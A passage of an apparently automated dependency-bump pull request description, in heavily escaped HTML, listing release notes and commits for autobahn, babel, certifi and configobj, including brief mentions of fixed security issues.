\u0026lt;https://github.com/crossbario/autobahn-python/pull/1634\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.6.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: use regular PyPI bitarray\u0026gt;=2.7.5 rather than from GitHub master\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.6.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: updated bitarray to make eth-account work on pypy\u003c/li\u003e\n\u003cli\u003efix: updated web3 and eth-abi to not use beta versions (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1616\"\u003e#1616\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.1.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: monkey patch web3/eth_abi for python 3.11\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e23.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: support for Python up to v3.11\u003c/li\u003e\n\u003cli\u003efix: update GitHub CI\u003c/li\u003e\n\u003cli\u003efix: copyright transferred to typedef int GmbH - no license change!\u003c/li\u003e\n\u003cli\u003efix: remove coverage crap\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e22.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003enew: expand WAMP Flatbuffers schemata (session ID in each message for MUXing)\u003c/li\u003e\n\u003cli\u003enew: update flatc v22.12.06 and regenerate WAMP Flatbuffers type libraries\u003c/li\u003e\n\u003cli\u003efix: Twisted 22.10.0 incompability (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1604\"\u003e#1604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: Rapid Cancelling Of Tasks Can Cause InvalidStateError (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1600\"\u003e#1600\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: identify_realm_name_category (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1590\"\u003e#1590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: support Python 3.11 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1599\"\u003e#1599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: building _nvx_utf8validator extension on non-x86 systems (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1596\"\u003e#1596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix: asyncio rawsocket protocol transport details (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1592\"\u003e#1592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew: expand EIP712AuthorityCertificate; more tests\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e22.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/f38f16ba28fa253dee951068cc729089c88d857d\"\u003e\u003ccode\u003ef38f16b\u003c/code\u003e\u003c/a\u003e Random ID should beginning with 1 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1637\"\u003e#1637\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/1a7aaa9d90929a37e52f004e5d952490b185c305\"\u003e\u003ccode\u003e1a7aaa9\u003c/code\u003e\u003c/a\u003e Httpheaders (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1638\"\u003e#1638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/75f3758127d1cf0ddb4450f80e30931353b3adca\"\u003e\u003ccode\u003e75f3758\u003c/code\u003e\u003c/a\u003e update license file to include contributors (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1628\"\u003e#1628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/50e6297bc34e55a364bfa507de041e2b0cd99ed7\"\u003e\u003ccode\u003e50e6297\u003c/code\u003e\u003c/a\u003e a couple of packaging fixes (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1632\"\u003e#1632\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/924604ed250b565bcd17a30c101a86c67864811e\"\u003e\u003ccode\u003e924604e\u003c/code\u003e\u003c/a\u003e bump minimum twisted to 24.3.0 (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1635\"\u003e#1635\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/5ab94618723c488df640ae0777ac5a16ee1ab369\"\u003e\u003ccode\u003e5ab9461\u003c/code\u003e\u003c/a\u003e unit test fixes (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1634\"\u003e#1634\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/359f868f9db410586cf01c071220994d8d7f165a\"\u003e\u003ccode\u003e359f868\u003c/code\u003e\u003c/a\u003e prepare release (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1620\"\u003e#1620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/a7c7dff0c734d4e1798085a8106cf656e2c5a23d\"\u003e\u003ccode\u003ea7c7dff\u003c/code\u003e\u003c/a\u003e prepare release (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1617\"\u003e#1617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/f2505175ce86bec668ca1163a9e0f14b54afbae0\"\u003e\u003ccode\u003ef250517\u003c/code\u003e\u003c/a\u003e Updates the GHA deploy workflow to build the universal wheel and upload to Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/crossbario/autobahn-python/commit/a51c2f52af25dcd949e47467f3ae048761d399e8\"\u003e\u003ccode\u003ea51c2f5\u003c/code\u003e\u003c/a\u003e Updated web3 and eth-abi to not use beta versions (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1616\"\u003e#1616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/crossbario/autobahn-python/compare/v18.6.1...v24.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.6.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.6.0...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `certifi` from 2018.4.16 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2018.04.16...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `configobj` from 5.0.6 to 5.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/DiffSK/configobj/releases\"\u003econfigobj's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.0.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddress CVE-2023-26112 ReDoS by \u003ca href=\"https://github.com/cdcadman\"\u003e\u003ccode\u003e@​cdcadman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/236\"\u003eDiffSK/configobj#236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop Python 2 support and compatibility code by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/237\"\u003eDiffSK/configobj#237\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExtra 2014 by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/245\"\u003eDiffSK/configobj#245\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esetup.py: fix license tag by \u003ca href=\"https://github.com/yegorich\"\u003e\u003ccode\u003e@​yegorich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/241\"\u003eDiffSK/configobj#241\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minimum python to 3.7 everywhere, and add 3.12 by \u003ca href=\"https://github.com/jelmer\"\u003e\u003ccode\u003e@​jelmer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/246\"\u003eDiffSK/configobj#246\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cdcadman\"\u003e\u003ccode\u003e@​cdcadman\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/236\"\u003eDiffSK/configobj#236\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yegorich\"\u003e\u003ccode\u003e@​yegorich\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/DiffSK/configobj/pull/241\"\u003eDiffSK/configobj#241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/DiffSK/configobj/compare/v5.0.8...v5.0.9\"\u003ehttps://github.com/DiffSK/configobj/compare/v5.0.8...v5.0.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003econfirming things work in newer python versions\u003c/h2\u003e\n\u003cp\u003e5.0.7 originally did this work, but 5.0.8 fixes a regression (\u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/230\"\u003e#230\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/DiffSK/configobj/blob/release/CHANGES.rst\"\u003econfigobj's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cp\u003eRelease 5.0.9\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edrop support for Python 2 and \u0026lt;3.7\u003c/li\u003e\n\u003cli\u003efix CVE-2023-26112, ReDoS attack\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eRelease 5.0.8\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efixing/test for a regression introduced in 5.0.7 that prevented \u003ccode\u003eimport validate\u003c/code\u003e from working\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eRelease 5.0.7\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eupdate testing to validate against python version 2.7 and 3.5-3.11\u003c/li\u003e\n\u003cli\u003eupdate broken links / non-existent services and references\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOlder 